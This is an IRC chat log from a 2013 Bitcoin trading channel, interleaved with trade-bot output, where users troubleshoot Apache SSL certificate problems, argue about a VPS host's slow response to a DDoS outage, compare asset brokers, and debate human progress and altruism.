22:24:00 I think things would be rather loose in that case. Mar 14 22:31:50 basically AJ says Max Keiser created Bitcoin Mar 14 22:33:49 hehe they mention intrade Mar 14 22:35:44 ;;ident kakobrekla Mar 14 22:35:44 Nick 'kakobrekla', with hostmask 'kakobrekla!~kako@unaffiliated/kakobrekla', is identified as user kakobrekla, with GPG key id 27AF75321F2489E8, key fingerprint 27C3CE9A20851312F086268C27AF75321F2489E8, and bitcoin address None Mar 14 22:44:33 brb Mar 14 22:52:56 ;;goxlag Mar 14 22:52:56 48.115083 seconds Mar 14 22:53:25 hmm, there hasn't been an order reported from gox in a while Mar 14 22:53:29 about .5 hr Mar 14 22:56:51 strange, bitcoincharts is seeing orders Mar 14 23:05:39 [BTCTC] [S.MPOE-PT] 30 @ 0.00068 = 0.0204 BTC [-] Mar 14 23:07:37 markedathome dude you're becoming like a beacon of sanity or something Mar 14 23:08:00 "So please, lets just admit we aren't up to spec and have never been up to spec, and focus on getting there instead of pretending that "the world is after all perfect, if requiring a little adjustment" is a bastion of software engineering." Mar 14 23:08:00 /l markedathome Mar 14 23:08:03 [BTCTC] [S.MPOE-PT] 70 @ 0.00068 = 0.0476 BTC [-] Mar 14 23:08:12 oh, not here tho Mar 14 23:08:42 mircea_popescu: ? Mar 14 23:08:59 smickles https://bitcointalk.org/index.php?topic=140233.msg1623175#msg1623175 Mar 14 23:09:01 fuckin stupid bitcoind Mar 14 23:09:11 sendfrom "x" addy ammt Mar 14 23:09:16 sends from addy y Mar 14 23:09:20 not from x Mar 14 23:09:27 stupid. Mar 14 23:09:48 meanwhile, some guy has the following point : Mar 14 23:09:49 "So for a single database transaction which consists of all Bitcoin transactions in the block the number of locks required is O(N * log_b S). This number has no upper bound, it logaritmically increases with the size of blkindex.dat." Mar 14 23:09:57 basically... the current bug would have wiped us. Mar 14 23:10:05 kakobrekla: stop complaining and code your own one nyeaa nyeaa nyeaa Mar 14 23:10:37 [BTCTC] [ASICMINER-PT] 1 @ 0.769996 BTC [+] Mar 14 23:11:34 this just fucked. Mar 14 23:12:28 and its not some optimisation feature as well Mar 14 23:12:33 cause they all got nice blocks of 100 Mar 14 23:12:38 but noooo Mar 14 23:12:46 lets not take what user specified Mar 14 23:12:57 lets take some other euqal block of 100 Mar 14 23:12:59 [BTCTC] [PAJKA.BOND] 4 @ 0.1 = 0.4 BTC [+] Mar 14 23:13:04 anyway, from reviewing the summaries of ~15mb of public and private conversations re this bug i'm sort-of contented that people have mostly got it, Mar 14 23:13:31 and while they have somewhat humanly understandable trouble coming out with "We're idiots", nevertheless the message has landed fine and people are working at it. Mar 14 23:13:37 ima give it a month or two and see. Mar 14 23:14:17 ug, why can't i tell this thing to use my self signed cert ? Mar 14 23:14:29 I don't understand how the price is holding given the uncertainty surrounding the bug. Mar 14 23:14:39 TomServo alex jones. Mar 14 23:14:42 anyone know of a good free ssl cert issuer who isn't just mining me for information? Mar 14 23:14:48 haha Mar 14 23:14:49 smickles nope Mar 14 23:15:10 mircea_popescu: i thought you just didn't use ssl, so how would you know? Mar 14 23:15:13 :P Mar 14 23:15:19 why do you think i don't ? Mar 14 23:15:34 conflated memory, probably Mar 14 23:16:16 smickles, startssl? can't get much better than that Mar 14 23:16:49 free for a yeah, eh? Mar 14 23:16:58 *year Mar 14 23:17:14 those certs are like 10$ a pop Mar 14 23:17:15 yes. then you just make other request and go another year Mar 14 23:17:23 why would you hassle with startssl Mar 14 23:17:36 kakobrekla: what do you suggest then? Mar 14 23:17:56 i got comodo positivessl Mar 14 23:18:42 dunno find a source of cheap ones Mar 14 23:18:53 i have a guy here that can make em for 10e or so Mar 14 23:19:39 mircea_popescu where is that pissing on the devs thread urlpls Mar 14 23:20:02 [BTCTC] [ASICMINER-PT] 2 @ 0.769996 = 1.54 BTC [+] Mar 14 23:20:04 https://bitcointalk.org/index.php?topic=152027.0 Mar 14 23:20:07 ty Mar 14 23:20:07 o lol Mar 14 23:20:57 lol, there's also spanking thread to each according to their taste. Mar 14 23:21:02 Well I managed to get gigavps to remove me from skype by arguing against his paid upgrade. Mar 14 23:21:14 lol Mar 14 23:21:34 oh Namworld, btw i got an invoice from bitvps Mar 14 23:21:54 Not sure how he justify all those costs... Mar 14 23:21:55 i hereby recommend you all to stick it into orifice of your choice Mar 14 23:22:05 wtf, startssl just gave me a timeout Mar 14 23:22:50 smickles they wont give ssl to bitcoin related services Mar 14 23:22:51 Oh, that was already taken care of. Mar 14 23:22:54 cause its 'financial' Mar 14 23:22:58 and that cant be free Mar 14 23:23:54 kakobrekla: suppose i tell them that it's an accounting service and not mention anything about bitcoin Mar 14 23:24:02 'cause that's true Mar 14 23:24:11 yeah, accounting, nothing to do with finance Mar 14 23:24:51 feel free to hassle with them. Mar 14 23:25:46 well, i'm not finding this 10 euro guy who you have Mar 14 23:25:49 the word is hustle Mar 14 23:25:54 so i'm doing research Mar 14 23:25:56 not if it nas *coin* in the domain Mar 14 23:26:00 *has Mar 14 23:26:09 acointing. Mar 14 23:26:15 not a coin, not accounting. Mar 14 23:26:48 acointing or accointing dot something Mar 14 23:26:52 smickles, i shopped here: https://www.namecheap.com/ssl-certificates/comodo.aspx Mar 14 23:27:03 kakobrekla: it's smickles.com Mar 14 23:27:32 [BTCTC] [SYNERGY] 1 @ 0.05103 BTC [-] Mar 14 23:27:34 [BTCTC] [SYNERGY] 1 @ 0.05102 BTC [-] Mar 14 23:27:40 [BTCTC] [SYNERGY] 1 @ 0.05017 BTC [-] Mar 14 23:27:43 there ya go that should do it Mar 14 23:27:43 [BTCTC] [SYNERGY] 1 @ 0.05 BTC [-] Mar 14 23:27:52 ah, thx jurov :) Mar 14 23:27:55 startssl prolly says they don't endorse fecal humor Mar 14 23:28:04 da fuck is this endorse bs Mar 14 23:28:26 and btw, to all the people who think they are safe from ddos because "cloudflare" or equal bs : Mar 14 23:28:34 what do you do when they "don't endorse" your site ? Mar 14 23:29:10 go home Mar 14 23:29:38 Why didn't you put a cancellation request jurov? Mar 14 23:29:48 sounds like a great plan, strategic manager should get a bonus for that oen. Mar 14 23:30:33 Namworld, phungus clearly said "we won't ever turn your vps again." Mar 14 23:30:44 ah Mar 14 23:30:46 so he's now responsible for any cancella tions Mar 14 23:31:33 I hope he wasn't as harsh as that short sentence makes it sound. Mar 14 23:31:43 "...users using hotmail.com email address may have difficulty in receiving their hosting welcome emails from us. We strongly recommend that you use some other email address at this time. We also would advise you to contact our support using a non-hotmail email address to receive replies properly. It is especially hard to track email delivery failure with Hotmail, as Hotmail servers do not return a failed status, but silently discard emails which d Mar 14 23:31:46 look into #bitvps logs, it's there Mar 14 23:31:50 lol Mar 14 23:32:11 I'm not in there 24/7 Mar 14 23:32:45 really should i dig them for you? Mar 14 23:34:15 they clearly kicked me out. so they should also cancel my acct themselves. Mar 14 23:34:50 urgh, then service should also have been cancelled Mar 14 23:35:13 you mean the BitVPS? Mar 14 23:35:23 yes bitvps Mar 14 23:35:34 yes so he doesn't receive invoices anymore Mar 14 23:35:42 bitvps should be canceled yea Mar 14 23:35:45 its a joke Mar 14 23:36:07 Why? Mar 14 23:36:23 "we won't ever turn your vps again." Mar 14 23:36:25 this sums it up Mar 14 23:37:01 I should probably handle PR from now on... Mar 14 23:37:18 what would you do? Mar 14 23:37:20 its not a PR issue Mar 14 23:37:42 It is if that's the way things are announced. Mar 14 23:38:08 Namworld, PR-side I recommend that next time a client mentions ddos possibility, you damn well listen to them Mar 14 23:38:23 not like "oh coinbr.com seems under dos, too" Mar 14 23:38:48 "let's do nothing" Mar 14 23:39:07 lol Mar 14 23:39:12 facepalm Mar 14 23:39:40 well in fairness vps wasn't going to be able to take it. Mar 14 23:39:45 I wasn't aware of anything Mar 14 23:40:47 eh, not gonna to discuss this again, you're never aware of anything Mar 14 23:41:49 Either way, we only have a few dozens clients and few dedis. Not like we could have handled a large DDoS. Mar 14 23:41:53 Doesn't seem like the let go was handled properly at all. Mar 14 23:42:16 I've cancelled the service, you'll no longer receive invoices/notices. Mar 14 23:43:07 Namworld what do you do when a client is 1 month late on payment Mar 14 23:43:07 okay, so i'll ask only one thing. next time client asks you "in case of ddos, will i be billed the traffic?" what do you answer? Mar 14 23:43:32 i hope not "i'll be surprised" like you did last week just few hours before the ddos Mar 14 23:44:08 now you probably aren't aware this happened but damn well it did. in this very channel. Mar 14 23:44:21 hi all Mar 14 23:44:31 hi Mar 14 23:54:03 okay, so i'll ask only one thing. next time client asks you "in case of ddos, will i be billed the traffic?" what do you answer? Mar 14 23:55:34 Namworld: what? you don't know what to do in this case? Mar 14 23:55:55 http://btlondon2012.co.uk/pano.html Mar 14 23:55:58 What's that about? We don't bill extra traffic, we'd ask the person to upgrade. In your case tho, would have been impossible to support you further. We'd have to drop DDoSed clients Mar 14 23:56:02 get your stalk on Mar 14 23:56:32 No, you make it sounds like someone said you'd be billed for it. Mar 14 23:57:06 No, I think the right answer would be to ask the client why they expect the dos and where Mar 14 23:57:23 and move the info to tech staff Mar 15 00:00:02 Oh, We don't have the infrastructure to handle any large DoS tho, we're relatively a very small host. Not the kind that was being conducted against MPEx. Not sure what you would ahve wanted us to do. Mar 15 00:00:04 http://www.buzzfeed.com/ryanhatesthis/reuters-social-media-editor-indicted-for-allegedly-conspirin Mar 15 00:00:09 vaguely related Mar 15 00:00:39 It's just not feasible for us to do so. Mar 15 00:01:03 Namworld, i wanted you to consider the possibility beforehand. not being caught like a deer in the headlights Mar 15 00:01:45 and even then, the ddos was raging for 6 hours till anyone started to do anything with it!!!! Mar 15 00:01:57 if i may, everyone has a point here. in fairness we didnt really know how hot things will get early on. in retrospect it can be said that "well duh, obviously if it can take out mpex's main it will wipe a vps somewhere". but at the time i was busy and i guess nobody else realised it. Mar 15 00:02:19 on the other hand there's never going to be an economical solution to offer vps servers and yet scale it up in case of a serious ddos Mar 15 00:03:11 so practically a vps host can't do much more than "sorry, we can't host you, you're too big". Mar 15 00:03:35 well, having an alert for such cases is well within their economical reach... instead of waiting 8 hours till whole dc is in ashes Mar 15 00:03:51 I think while there could have been a quicker response (and really the pain here is for any other customer of bitvps), a $20 vps is not expected to handle any kind of dos in a way that mitigates the attack for its target Mar 15 00:03:54 yeah i guess communications didn't work. Mar 15 00:04:04 actually, Mar 15 00:04:26 Till whole DC? Mar 15 00:04:28 thats just my experience with gettign dos'd on $20 vpsen :) Mar 15 00:04:42 We have 1 server in switzerland. Mar 15 00:04:44 and yes I took out linodes fremont facility once Mar 15 00:05:04 because someone wanted my nick on IRC Mar 15 00:05:13 lol Mar 15 00:06:54 okay, it was the server then, not the dc. and yes, i shouldn't have expected any thing else Mar 15 00:07:28 but having to wait 6 hours and then another 2 hours fo r the staff trying to figure out if it's really an attack Mar 15 00:07:36 that would enrage everyone Mar 15 00:08:04 in fact going through the logs, Mar 15 00:08:05 Mar 07 03:46:04 Namworld if this causes to overstep my bitvps bandwidth, or causes bitvps to be included in ddos outright Mar 15 00:08:05 Mar 07 03:48:14 i would be surprised, jurov Mar 15 00:08:11 some warning was issued. Mar 15 00:08:45 ^exactly this i was speaking about Mar 15 00:08:49 thx mircea Mar 15 00:09:07 well... he promised to be surprised, he was surprised. no scam. Mar 15 00:09:13 hehe Mar 15 00:09:29 ... that's not really the point Mar 15 00:09:54 But apparently yes, words got out quickly and it was DDoS'ed too. Mar 15 00:10:05 anyway. it doesn't look like there's much more anyone could have done practically. Mar 15 00:10:18 We only have a few nodes, we might be the most popular host in BTC zone but that's quite small a clientbase. Mar 15 00:11:09 well, but if you don't want to host anything critical, where does this leave you? Mar 15 00:11:27 irc knitting group with some hosting slapped on? Mar 15 00:11:37 jurov listen, pretty much nobody offers off the shelf ddos proof hosting Mar 15 00:11:45 it's just too expensive. Mar 15 00:12:53 It actually is very expensive. Pretty much any host will kick someone getting DDoSed outright. Not that it's something we'd wish to do, but it's not economically feasible at the cost VPSes/Shared hosting are billed. Mar 15 00:13:25 and we are pretty much salvaging RG's business which was barely breaken even. There's no money for 24/7 staff and we all have to work on it outside our day job/etc. Mar 15 00:13:58 We're already moving out of rented servers and have bought dedicated servers. We'll be upgrading and consolidating. Mar 15 00:14:12 Namworld it's a best effort business, we get it. perhaps the only improvement is to have an internal messaging system somehow, so if you hear ddos early warning it can be used somehow Mar 15 00:14:16 if that's even possible. Mar 15 00:14:21 But we're pretty much investing in a business that was in the red. Mar 15 00:14:46 Once we get our own servers instead of renting, we'll be in the green. For now we're focused on doing that and moving clients. Mar 15 00:14:58 Once that is done we can start improving services. Mar 15 00:15:14 But there's still a lot of work ahead. Mar 15 00:16:13 to be honest, i was thinking about moving somewhere else back after december outage Mar 15 00:16:39 but couldn't get any good advice except to pay heavy $$$ Mar 15 00:16:59 I would only go with big name brand for a vps Mar 15 00:17:17 The switzerland node we have has been getting many issues at the DC level. We might drop it altogether and have to find another node to rent for Europe. Mar 15 00:17:18 there are so many 2 bit (!) shops out there Mar 15 00:17:35 For US we're consolidating clients in New York on owned servers. Mar 15 00:20:35 jurov: not to be rude, and this is why I still use linode, you can't expect any $20 vps to handle anything critical Mar 15 00:22:30 okay okay, i'm not complaining about that Mar 15 00:22:47 i have just issue with communication and delays Mar 15 00:24:59 but prolly that's to be expected for $40 vps, too... Mar 15 00:25:02 Namworld hetzner Mar 15 00:25:34 jurov: yep Mar 15 00:25:51 kako: what? Mar 15 00:25:59 Well we hope to be able to be staffed 24/7 later on. Mar 15 00:26:14 >We might drop it altogether and have to find another node to rent for Europe. Mar 15 00:26:18 http://www.hetzner.de/en/hosting/produktmatrix/rootserver-produktmatrix-ex Mar 15 00:26:19 good, cheap, fast, pick two Mar 15 00:29:25 Beyond mitigation steps with firewall software, you could architect the web app to easily scale to multiple servers, then toss in nodes from AWS on demand during an attack. A bit pricey, but if the question is whether you pay more or shut down... Mar 15 00:29:27 sex. Mar 15 00:30:02 parseval software firewalls weren't even being touched, routers got it. Mar 15 00:30:19 Nice Mar 15 00:30:59 [MPEX] [X.IDIFF.JUN] 1 @ 0.08995 BTC [-] Mar 15 00:31:54 ;;bc,diff Mar 15 00:31:54 4847647.1520656 Mar 15 00:36:04 which broker is better coinbr or btc-tc ? Mar 15 00:36:50 RandolphDuke btc-tc is exchange not broker Mar 15 00:37:15 Indeed Mar 15 00:37:18 and you did not say your criteria Mar 15 00:37:22 so how do they have mpex assets? Mar 15 00:37:40 these are passthroughs backed by mpex assets Mar 15 00:37:40 jurov: recieving dividends Mar 15 00:38:19 from what i take it btc-tc takes 5% of the dividend ammount Mar 15 00:38:26 and coinbr charges a monthly fee Mar 15 00:38:38 coinbr is not asking a fee for receiving dividends, but asks 0.09/month flat Mar 15 00:39:07 what about reputation, is coinbr the same people as mpex? Mar 15 00:39:36 coinbr is jurov Mar 15 00:39:39 no, i'm coinbr owner, mircea_popescu is mpex owner Mar 15 00:39:41 ;;getrating jurov Mar 15 00:39:41 WARNING: Currently not authenticated. User jurov, rated since Fri Jan 20 15:16:32 2012. Cumulative rating 24, from 15 total ratings. Received ratings: 15 positive, 0 negative. Sent ratings: 10 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=jurov Mar 15 00:39:59 he has a good reputation Mar 15 00:40:14 what about security of funds Mar 15 00:41:08 it's discussed extensively on bitointalk, lemme dig it... Mar 15 00:41:22 thnx Mar 15 00:41:28 here: https://bitcointalk.org/index.php?topic=118551.0 Mar 15 00:44:58 [BTCTC] [S.BBET-PT] 10 @ 0.0018 = 0.018 BTC [-] Mar 15 00:48:05 [HAVELOCK] [SDICE] 4 @ 0.53 = 2.12 BTC [-] Mar 15 01:08:45 havelock is another broker or exchange? Mar 15 01:09:43 exchange Mar 15 01:13:38 RandolphDuke: i believe that coinbr is the only mpex broker with a website Mar 15 01:14:17 and, ugg, i just installed a proper ssl cert ... now apache wont start Mar 15 01:14:32 and i can't find any useful error in the logs Mar 15 01:14:35 :PP Mar 15 01:17:34 Inaba: My open offer for a bet: BFL will ship the promised products within a reasonable time frame (as determined by a reputable member of this community, I propose Casascius). I offer BTC from 100 BTC to 2000 BTC. I am also willing to accept the domain name joshzerlan.com in lieu of BTC on the part of Bryan Micon. Mar 15 01:17:41 how could i have missed that. Mar 15 01:18:24 gotta love the reasonable timeframe Mar 15 01:21:29 lol Mar 15 01:24:09 kakobrekla : make an alias for josh-zerlan.com on bitbet's server Mar 15 01:24:14 and redirect it to the march bfl bet. Mar 15 01:24:17 gimme the ns. Mar 15 01:24:41 [BTCTC] [BASIC-MINING] 1 @ 0.3449 BTC [+] Mar 15 01:25:29 how am i supposed to fix something when there are no errormessages or logs? Mar 15 01:25:52 smickles join the club, my sysadmin ppls have been wrangling with something exactly liek that for 3 days now. Mar 15 01:27:15 mircea_popescu: but this should be simple, and common. I'm sure many people install ssl certs Mar 15 01:27:29 yah well... Mar 15 01:29:06 selinux / strace are your friends and foe Mar 15 01:29:26 !ticker m S.MPOE Mar 15 01:29:28 [MPEX:S.MPOE] 1D: 0.00072543 / 0.00072578 / 0.00072614 (22480 shares, 16.32 BTC), 7D: 0.00067334 / 0.00074098 / 0.00076718 (769435 shares, 570.14 BTC), 30D: 0.00061614 / 0.00069589 / 0.00078628 (43419967 shares, 30,215.69 BTC) Mar 15 01:30:16 http://trilema.com/2013/digging-through-archives-yields-gold/ Mar 15 01:30:21 from my personal "must read collection Mar 15 01:31:22 !ticker m S.DICE Mar 15 01:31:23 [MPEX:S.DICE] 1D: 0.00569985 / 0.00584763 / 0.00599987 (473 shares, 2.77 BTC), 7D: 0.00413 / 0.00575556 / 0.006 (50044 shares, 288.03 BTC), 30D: 0.00300001 / 0.00613776 / 0.0069 (2392891 shares, 14,687.00 BTC) Mar 15 01:34:27 the internet is so useful: "Wow after hours of digging I finally found the solution thanks to a post by rajanichand Here what I did in httpd.conf I commented out the SSLCACertificateFile line and it worked." Mar 15 01:35:10 haha cool Mar 15 01:35:34 unfortunately, i don't think i have the right kind of mind for that solution Mar 15 01:37:04 and i've come across a handfull of "UPDATE: i fixed it after finding _this_line_ in som OTHER logs" But they never say what logs those were Mar 15 01:40:07 you know... Mar 15 01:40:09 those other logs Mar 15 01:41:05 smickles, you don't have passphrase set on key? Mar 15 01:41:24 so that apache is stopping somewhere and waiting for it Mar 15 01:42:14 jurov: i believe i do have a passphrase set on the key Mar 15 01:42:48 get rid of it.. you can add it later if desired Mar 15 01:42:49 could it be stopping and waiting for me to type it in somehow? Mar 15 01:43:00 yes tat's exactly what it does Mar 15 01:43:00 oh, howto get rid of it? Mar 15 01:43:16 some openssl magic invocation Mar 15 01:43:33 i will send you a tip if this works Mar 15 01:44:31 hmm, i'm going to have to send a new csr to those guys now, arn't i Mar 15 01:45:19 http://www.mnxsolutions.com/apache/removing-a-passphrase-from-an-ssl-key.html << smickles Mar 15 01:50:49 jurov: give me an addy, it worked. Mar 15 01:51:08 but now, the thing that prompted me to do this is giveing another error Mar 15 01:51:17 D: Mar 15 01:51:33 what thing? Mar 15 01:51:54 blockchain.info's api making a callback to my server Mar 15 01:52:15 their java install doesn't seem to think my cert is a good cert Mar 15 01:52:23 nromal browser is not complaining? Mar 15 01:52:48 yeah, works on chromium Mar 15 01:53:59 does apache provide all certs in chain or only the your one and the CA? Mar 15 01:54:38 i remember i had to add them all cause some browser was unhappy Mar 15 01:54:52 SSLCertificateChainFile /etc/apache2/PositiveSSL.ca-bundle Mar 15 01:55:03 is that what you're talking about? Mar 15 01:55:08 yea that should work Mar 15 01:55:26 yeah, it's in there, and has been in there Mar 15 01:56:30 i dunno. so 1DzxV3arKg22TfVYx4nw1rLFJmjLTnXHi7 then Mar 15 01:58:20 maybe you'll have to import them into java then Mar 15 02:00:49 lol, yeah, import my cert into their java. anyway, sent :) Mar 15 02:01:37 what's the problem ? Mar 15 02:01:48 java is like, secure and maff and stuff Mar 15 02:03:04 mircea_popescu: when 'they' try to send a callback to my server, their software gives them "Error sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target" and gives up Mar 15 02:03:38 hm Mar 15 02:04:09 https://forums.comodo.com/ssl_certificate/unable_to_find_valid_certification_path_to_requested_target-t17086.0.html;wap2= Mar 15 02:04:19 you know they could just add your cert. Mar 15 02:04:22 lol maybe their java is outdated Mar 15 02:04:49 wtf, would they really be on 1.5? Mar 15 02:04:57 damn early 1.5 at that Mar 15 02:05:49 yawn Mar 15 02:06:00 my electrum wallet doesnt appear to work lol Mar 15 02:06:04 [HAVELOCK] [HIM] 1 @ 1.82 BTC [+] Mar 15 02:07:39 “The welfare state reduces a citizen to a client, subordinates them to a bureaucrat, and subjects them to rules that are anti- work, anti-family, anti-opportunity and anti-property... Humans forced to suffer under such anti-human rules naturally develop pathologies. The evening news is the natural result of the welfare state.” Mar 15 02:07:47 i'm like in love over here. Mar 15 02:08:37 mircea_popescu: don't love AJ, it's a sin Mar 15 02:08:45 aj ? Mar 15 02:08:52 alexjones Mar 15 02:09:00 that's not alex jones Mar 15 02:09:02 silly joke Mar 15 02:09:06 its some obscure jim beam dood Mar 15 02:09:54 that's an ungoogleable name Mar 15 02:14:18 http://jim.com/liberquo.htm Mar 15 02:14:24 jim.com, nicely enough Mar 15 02:20:52 [BTCTC] [COGNITIVE] 1 @ 0.1555 BTC [+] Mar 15 02:23:24 [BTCTC] [COGNITIVE] 1 @ 0.155 BTC [-] Mar 15 02:23:35 [BTCTC] [COGNITIVE] 1 @ 0.15199 BTC [-] Mar 15 02:23:56 [BTCTC] [COGNITIVE] 2 @ 0.15021 = 0.3004 BTC [-] Mar 15 02:24:24 [BTCTC] [COGNITIVE] 1 @ 0.15021 BTC [-] Mar 15 02:24:44 [BTCTC] [COGNITIVE] 6 @ 0.1502 = 0.9012 BTC [-] Mar 15 02:24:58 [BTCTC] [COGNITIVE] 20 @ 0.15 = 3 BTC [-] Mar 15 02:25:25 ahh, got a nice one for midnightmagic : Mar 15 02:25:27 “Altruism does not mean mere kindness or generosity, but the sacrifice of the best among men to the worst, the sacrifice of virtues to flaws, of ability to incompetence, of progress to stagnation--and the subordinating of all life and of all values to the claims of anyone's suffering.” Mar 15 02:28:58 !ticker h sdice Mar 15 02:29:00 [HAVELOCK:SDICE] 1D: 0.53000000 / 0.54966167 / 0.57000000 (60 shares, 32.97970000 BTC), 7D: 0.44000006 / 0.56318428 / 0.61999910 (735 shares, 413.94044920 BTC), 30D: 0.37000000 / 0.62515082 / 0.75900000 (5260 shares, 3288.29329337 BTC) Mar 15 02:29:03 !ticker m s.dice Mar 15 02:29:05 [MPEX:S.DICE] 1D: 0.00569985 / 0.00570109 / 0.00599986 (241 shares, 1.37 BTC), 7D: 0.00413 / 0.00575556 / 0.006 (50044 shares, 288.03 BTC), 30D: 0.00300001 / 0.00613751 / 0.0069 (2388391 shares, 14,658.80 BTC) Mar 15 02:44:15 jurov: phantomcircuit nailed the second issue, my server wasn't providing enough of the cert chain, browsers just dl the missing parts, java needs the whole thing spoon-fed to it Mar 15 02:47:26 [BTCTC] [ASICMINER-PT] 20 @ 0.769994 = 15.3999 BTC [-] Mar 15 02:48:39 [BTCTC] [ASICMINER-PT] 1 @ 0.769995 BTC [+] Mar 15 02:49:53 [BTCTC] [ASICMINER-PT] 4 @ 0.769996 = 3.08 BTC [+] Mar 15 02:50:45 [BTCTC] [S.DICE-PT] 1 @ 0.00574 BTC [+] Mar 15 02:52:12 http://xkcd.com/1181/ Mar 15 02:58:39 kakobrekla: not funny :P Mar 15 02:58:47 this one is http://xkcd.com/1169/ Mar 15 02:59:23 heh, actually i do think it's funny, but it sends a bad message Mar 15 03:07:20 in other news http://polimedia.us/dtng/c/src/136330962761.jpg Mar 15 03:08:00 [BTCTC] [BASIC-MINING] 1 @ 0.345 BTC [+] Mar 15 03:14:51 did you see my link before? Mar 15 03:15:11 be fun to set two points in london and try to navigate at full zoom Mar 15 03:15:20 http://btlondon2012.co.uk/pano.html Mar 15 03:18:08 fpr some values of fun Mar 15 03:18:43 tbh I spent ten minutes looking for porn and gave up Mar 15 03:20:11 probably need to refamiliarise myself with the best socioeconomic direction Mar 15 03:20:34 its been 30 odd years since I've been there Mar 15 03:27:18 been where ?! Mar 15 03:28:09 mircea_popescu: Human progress exists because people cooperate together, and are nice to each other. The peoples whose nature is to prey on other humans, to cast them away, or to be mercenary, these are destructive elements. People who are destructive while pretending their acts select for greater fitness is a perversion of the nature of Darwinism which does not, in fact, match reality. Mar 15 03:28:40 you equivocate plenty in there. progress does not exist. humans do live comfortably because they cooperate, but this does have no relation to being nice. Mar 15 03:28:49 gotta think cleanly if you aim to think at all. Mar 15 03:28:55 mircea_popescu: Nor is courtesy and kindness in the face of cruelty anything I would espouse. Mar 15 03:29:23 Progress does exist in the form of higher standards of living, freedom, and the advancement of human knowledge and science. Mar 15 03:29:52 standards of living have been collapsing ever since welfarism (which is a good example of the nice/cooperation confusion) Mar 15 03:30:00 mircea_popescu: If you would like to make a specific point about altruism rather than make quotation-like assertions, I would be happy to entertain it. Mar 15 03:30:06 the only way that collapse can be hidden is by avoiding reference to objective standard. Mar 15 03:30:08 That is actually completely false. Mar 15 03:30:16 so then we have a point. Mar 15 03:30:23 to disagree on :D Mar 15 03:30:43 And I would say that those who prey on other humans and run confidence games with them are more responsible for the destruction you think outweighs the progress humans have made in science and medicine. Mar 15 03:30:46 now let's take your progress apart. fewer people can read in the us today than did in 1913. Mar 15 03:31:02 Aumann's agreement theorem states one or both of us is, at that point, being irrational. Mar 15 03:31:05 [HAVELOCK] [SDICE] 2 @ 0.54 = 1.08 BTC [+] Mar 15 03:31:07 Thus, I do not agree to disagree. Mar 15 03:31:11 fewer people die today in good health than did in 1913 Mar 15 03:31:30 what esle was in there, o, right, freedom. Mar 15 03:31:37 i'll rest on that one, seems too easy. Mar 15 03:32:05 [HAVELOCK] [SDICE] 15 @ 0.53 = 7.95 BTC [-] Mar 15 03:32:35 That is a statement which is pointless: more people live longer, in better health than in 1913. Mar 15 03:32:36 also, you perhaps hold aumann in too high a regard. he's a minor bayesian, which is another way to say nonsense. Mar 15 03:32:53 midnightmagic only if you measure these like the us govt measures unemployment. Mar 15 03:33:12 take something inconvenient, like people who died of cancer before age 18. Mar 15 03:33:25 see how it went up by the 100's of %. Mar 15 03:33:32 I'm no sure you understand what Bayesian reasoning is at this point. Mar 15 03:33:59 im pretty sure you lack the cognitive trappings that'd allow you to evaluate that meta-point, so let's allow it to go silent. Mar 15 03:35:57 You make a nonsense assertion about Bayesian reasoning being nonsense and then tell me I'm incapable of cognition for saying you're making ignorant comments? Mar 15 03:36:10 You know you could have just said, "no, u" Mar 15 03:37:01 here's the thing : the theorem you cite refers to something very speciffic. Mar 15 03:37:16 you are applying it with no consideration given to the conditions of validity it contains Mar 15 03:37:18 this speaks of you. Mar 15 03:37:19 mircea_popescu: The population of the world also went up. Your statements of statistics are flawed, and either you're doing it on purpose and waiting for me to mock you, or you really do think these things, in which case I .. well I'm not sure where to go from there. Mar 15 03:37:29 right, see ? Mar 15 03:37:34 we have problems. Mar 15 03:37:56 Lemme give it a stab. Pirates and global warming? Mar 15 03:38:05 what about these ? Mar 15 03:38:49 If population itself rises by x%, and you say number of cancer cases have increased by x%, you are actually saying cancer *rates* have remained static. Mar 15 03:39:14 listen, the reason i phrased that way is not because of a misunderstanding of statistics, as you seem inclined to conveniently surmise. Mar 15 03:39:35 it's because i presupposed in your usage of "progress" that you do not look at percents but absolutes. Mar 15 03:39:41 you'd have to, in order to maintain coherence. Mar 15 03:39:41 I surmise but not conclude, as you'll note in my previous comment about the possibilities of why you're doing that. Mar 15 03:39:46 "no kids left behind" and all that. Mar 15 03:40:23 (yes, surmise but not conclude. which is specifically why i used that word and not the other. i'm trying to help you judge here.) Mar 15 03:40:37 You make it easy to be uncivil, mircea. Mar 15 03:40:42 you're welcome. Mar 15 03:40:53 I don't feel so. Mar 15 03:41:04 well... not like you have to :p Mar 15 03:43:22 but let us better understand this notion of progress you use, because after all it's so messed up by commoners chewing on it. Mar 15 03:43:45 Well, it does free me up to mock your "my success by my measure makes me right" bias. Mar 15 03:43:56 Very well. Mar 15 03:44:15 so : if situation A is that 100 people die yearly in forest fires and situation B is that 3 people die yearly in forest fires but one person is kidnapped and tortured to death as a religious practice which causes the reduction in forest fires casualities, is a movement from A to B progress in your view ? Mar 15 03:45:01 :/ Mar 15 03:45:07 morning Mar 15 03:45:10 hi. Mar 15 03:45:39 gday maaaaate, how the bloody hell are ya? Mar 15 03:46:33 Human longevity has increased; human standards of living have increased; human freedom to pursue a healthy happy life is greater than it ever was; human knowledge is at its greatest peak in all of history; human treatment of disease is greater and more effective than it has ever been, ever in all history; human notions of morality and ethics (on the whole) are greater than they have ever been. Mar 15 03:46:45 ah but why muddy things up, just answer the q. Mar 15 03:48:14 I literally don't have an answer for your contrived example. Mar 15 03:48:33 perhaps human notions of morality and ethics aren't quite as developed as all that. Mar 15 03:48:47 or perhaps you're not quite up to the reading, seeing how it's both ancient and banal an example. Mar 15 03:48:55 but anyway. i'm satisfied myself, thanks. Mar 15 03:48:58 They are. We have natural rights now that humans have never had for basically all of recorded history. Mar 15 03:49:08 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [+] Mar 15 03:49:55 It's a stupid philosophical example with no bearing on my assertion. Mar 15 03:50:03 +s Mar 15 03:50:07 well, it's true it has no bearing on your assertions. Mar 15 03:50:13 the reason would be that they're empty pr stuff. Mar 15 03:50:23 where they mean anything they're false, where they're not false they're meaningless. Mar 15 03:51:16 for that matter the raw raw raw we are the best the sun has ever seen is possibly the oldest rabble rousing talk ever. older than Athens for sure. Mar 15 03:52:04 [HAVELOCK] [SDICE] 10 @ 0.52 = 5.2 BTC [-] Mar 15 03:52:14 So what? It's true now. Mar 15 03:52:29 it always was "true now". Mar 15 03:52:43 